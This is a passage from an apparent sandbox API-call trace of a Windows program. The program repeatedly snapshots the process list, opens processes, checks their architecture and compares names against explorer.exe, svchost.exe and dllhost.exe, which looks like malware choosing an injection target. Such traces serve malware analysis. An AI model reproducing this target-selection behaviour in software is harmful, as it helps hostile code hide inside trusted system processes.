pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0235.683] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0235.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0235.684] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0235.684] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0235.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0235.685] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0235.685] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.685] CloseHandle (hObject=0xd8) returned 1 [0235.685] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0235.685] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0235.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0235.686] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.686] CloseHandle (hObject=0xd8) returned 1 [0235.686] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0235.686] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0235.686] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0235.686] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0235.686] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0235.687] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.687] CloseHandle (hObject=0xd8) returned 1 [0235.687] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0235.687] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.688] CloseHandle (hObject=0xd8) returned 1 [0235.688] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0235.688] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0235.688] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.688] CloseHandle (hObject=0xd8) returned 1 [0235.688] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.689] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0235.689] CloseHandle (hObject=0xd4) returned 1 [0235.689] Sleep (dwMilliseconds=0x3e8) [0236.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0236.711] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0236.712] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0236.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0236.712] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0236.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0236.713] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0236.713] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0236.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0236.714] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0236.714] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0236.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0236.715] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0236.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0236.715] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0236.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0236.716] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0236.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0236.716] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0236.717] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0236.717] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0236.718] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0236.718] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0236.719] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0236.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0236.719] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0236.720] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0236.720] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0236.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0236.721] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.721] CloseHandle (hObject=0xd8) returned 1 [0236.721] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0236.721] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0236.721] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0236.721] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0236.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0236.722] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0236.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0236.722] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.722] CloseHandle (hObject=0xd8) returned 1 [0236.722] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0236.722] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0236.722] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0236.722] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0236.723] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0236.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0236.723] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0236.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0236.724] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.724] CloseHandle (hObject=0xd8) returned 1 [0236.724] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0236.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0236.724] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.724] CloseHandle (hObject=0xd8) returned 1 [0236.725] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0236.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0236.725] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.725] CloseHandle (hObject=0xd8) returned 1 [0236.725] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0236.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0236.726] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.726] CloseHandle (hObject=0xd8) returned 1 [0236.726] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0236.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0236.726] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.726] CloseHandle (hObject=0xd8) returned 1 [0236.726] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0236.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0236.727] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.727] CloseHandle (hObject=0xd8) returned 1 [0236.727] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0236.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0236.727] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.727] CloseHandle (hObject=0xd8) returned 1 [0236.727] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0236.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0236.728] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.728] CloseHandle (hObject=0xd8) returned 1 [0236.728] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0236.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0236.729] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.729] CloseHandle (hObject=0xd8) returned 1 [0236.729] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0236.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0236.729] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.729] CloseHandle (hObject=0xd8) returned 1 [0236.729] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0236.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0236.730] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.730] CloseHandle (hObject=0xd8) returned 1 [0236.730] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0236.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0236.730] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.730] CloseHandle (hObject=0xd8) returned 1 [0236.730] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0236.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0236.731] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.731] CloseHandle (hObject=0xd8) returned 1 [0236.731] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0236.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0236.732] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.732] CloseHandle (hObject=0xd8) returned 1 [0236.732] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0236.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0236.732] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.732] CloseHandle (hObject=0xd8) returned 1 [0236.732] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0236.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0236.733] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.733] CloseHandle (hObject=0xd8) returned 1 [0236.733] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0236.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0236.733] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.733] CloseHandle (hObject=0xd8) returned 1 [0236.733] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0236.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0236.734] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0236.734] CloseHandle (hObject=0xd8) returned 1 [0236.734] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 